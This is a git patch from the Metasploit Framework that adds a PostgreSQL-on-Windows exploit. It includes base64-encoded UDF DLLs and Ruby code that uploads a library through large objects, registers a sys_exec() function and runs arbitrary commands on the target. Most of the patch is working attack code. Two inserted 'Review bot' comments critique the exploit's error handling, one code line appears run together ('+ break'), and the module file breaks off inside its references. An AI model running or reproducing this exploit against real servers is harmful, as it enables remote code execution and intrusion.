From b1178686cf1cbfc49392ccdc7ef2146aef8853d3 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 23 Mar 2011 19:36:07 +0000 Subject: [PATCH] Fixes #3988. Adds a command execution module for PostgreSQL by uploading a UDF library and adding sys_exec() as a temporary function. Requires the target to be Windows, uses Bernardo Damele A. G.'s binaries. Also fixes a typo in the arguments to handler which clears up a heretofore mysterious exception (see exploit.rb). git-svn-id: file:///home/svn/framework3/trunk@12111 4d416f70-5f16-0410-b530-b9f4589650da --- .../postgres/8.2/lib_postgresqludf_sys.dll | Bin 0 -> 6656 bytes .../postgres/8.3/lib_postgresqludf_sys.dll | Bin 0 -> 6656 bytes .../postgres/8.4/lib_postgresqludf_sys.dll | Bin 0 -> 6656 bytes lib/msf/core/exploit.rb | 2 +- lib/msf/core/exploit/postgres.rb | 83 ++++++++++ .../windows/postgres/postgres_payload.rb | 147 ++++++++++++++++++ 6 files changed, 231 insertions(+), 1 deletion(-) create mode 100755 data/exploits/postgres/8.2/lib_postgresqludf_sys.dll create mode 100755 data/exploits/postgres/8.3/lib_postgresqludf_sys.dll create mode 100755 data/exploits/postgres/8.4/lib_postgresqludf_sys.dll create mode 100644 modules/exploits/windows/postgres/postgres_payload.rb 
diff --git a/data/exploits/postgres/8.2/lib_postgresqludf_sys.dll b/data/exploits/postgres/8.2/lib_postgresqludf_sys.dll new file mode 100755 index 0000000000000000000000000000000000000000..342d45a081ecf471591b59376d18d62ff454fdc7 GIT binary patch literal 6656 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 literal 0 HcmV?d00001 diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 1fcc8b03db..32c387f47f 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1165,7 +1165,7 @@ class Exploit < Msf::Module def handler(*args) return if not payload_instance return if not handler_enabled? - return payload_instance.handler(*args) + return payload_instance.handler(args) end ## diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 4348b06482..22ec2abfe6 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb 
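Review bot: `return payload_instance.handler(args)` now forwards the collected arguments as one array instead of splatting them, and nothing in `handler` records that this is intentional; since the commit message calls the old form a typo, a later reader may well "fix" it back to `*args`. A one-line comment above the call, e.g. `# intentionally not splatted: the payload handler receives the array itself`, would pin the intent. I cannot see the payload side's signature from this hunk, so whether it expects a single array or a variable argument list is inferred from the commit message only. The `Exploit` class enclosing `handler` starts and ends outside the hunk.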
@@ -264,5 +264,88 @@ module Exploit::Remote::Postgres
 end
 end
+ # Creates the function sys_exec() in the pg_temp schema.
+ def postgres_create_sys_exec(dll)
+ q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
+ resp = postgres_query(q);
+ if resp[:sql_error]
+ print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
+ return false
+ end
+ return true
+ end
+
+ def dll_fname(version)
+ File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll")
+ end
+
+ # This presumes the pg_temp.sys_exec() udf has been installed, almost
+ # certainly by postgres_create_sys_exec()
+ def postgres_sys_exec(cmd)
+ q = "select pg_temp.sys_exec('#{cmd}')"
+ resp = postgres_query(q)
+ if resp[:sql_error]
+ print_error resp[:sql_error]
+ return false
+ end
+ return true
+ end
+
+ # Takes a local filename and uploads it into a table as a Base64 encoded string.
+ # Returns an array if successful, false if not.
+ def postgres_upload_binary_file(fname)
+ data = postgres_base64_file(fname)
+ tbl,fld = postgres_create_stager_table
+ return false unless data && tbl && fld
+ q = "insert into #{tbl}(#{fld}) values('#{data}')"
+ resp = postgres_query(q)
+ if resp[:sql_error]
+ print_error resp[:sql_error]
+ return false
+ end
+ oid, fout = postgres_write_data_to_disk(tbl,fld)
+ return false unless oid && fout
+ return [tbl,fld,fout,oid]
+ end
+
+ # Writes b64 data from a table field, decoded, to disk.
+ def postgres_write_data_to_disk(tbl,fld)
+ oid = rand(60000) + 1000
+ fname = Rex::Text::rand_text_alpha(8) + ".dll"
+ queries = [
+ "select lo_create(#{oid})",
+ "update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+ "select lo_export(#{oid}, '#{fname}')"
+ ]
+ queries.each do |q|
+ resp = postgres_query(q)
+ if resp && resp[:sql_error]
+ print_error "Could not write the library to disk."
+ print_error resp[:sql_error] + break + end + end + return oid,fname + end + + # Base64's a file and returns the data. + def postgres_base64_file(fname) + data = File.open(fname, "rb") {|f| f.read f.stat.size} + [data].pack("m*").gsub(/\r?\n/,"") + end + + # Creates a temporary table to store base64'ed binary data in. + def postgres_create_stager_table + tbl = Rex::Text.rand_text_alpha(8).downcase + fld = Rex::Text.rand_text_alpha(8).downcase + resp = postgres_query("create temporary table #{tbl}(#{fld} text)") + if resp[:sql_error] + print_error resp[:sql_error] + return false + end + return [tbl,fld] + end + + end end diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb new file mode 100644 index 0000000000..e50ee68e67 --- /dev/null +++ b/modules/exploits/windows/postgres/postgres_payload.rb 
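Review bot: `postgres_write_data_to_disk` returns `oid,fname` even when one of its three queries fails, because the `break` in the error branch only leaves the `queries.each` loop; as a result the `return false unless oid && fout` guard in `postgres_upload_binary_file` can never fire and the caller goes on to `postgres_create_sys_exec` with a library that was never exported. Replacing `break` with `return false` (a `return` inside the block leaves the method) makes the failure visible to the caller. The nil handling of `postgres_query` results is also inconsistent within the hunk: `postgres_write_data_to_disk` tests `resp && resp[:sql_error]` while the other four new methods index `resp[:sql_error]` directly. `lo_export` is given a bare filename, so where the file lands depends on the server process's working directory — presumably the temp directory the new module's description refers to; a comment on `fname` stating that assumption would help. The enclosing module starts outside the hunk.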
@@ -0,0 +1,147 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Postgres
+ include Msf::Exploit::CmdStagerVBS
+
+ # Creates an instance of this module.
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PostgreSQL for Microsoft Windows Payload Execution',
+ 'Description' => %q{
+ This module creates and enables a custom UDF (user defined function) on the
+ target host via the UPDATE pg_largeobject method of binary injection. On
+ default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres
+ service account may write to the Windows temp directory, and may source
+ UDF DLL's from there as well.
+
+ PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are
+ valid targets for this module.
+
+ NOTE: This module will leave a payload executable on the target system when the
+ attack is finished, as well as the UDF DLL and the OID.
+ },
+ 'Author' =>
+ [
+ 'Bernardo Damele A. G. ', # the postgresql udf libraries
+ 'todb' # this Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
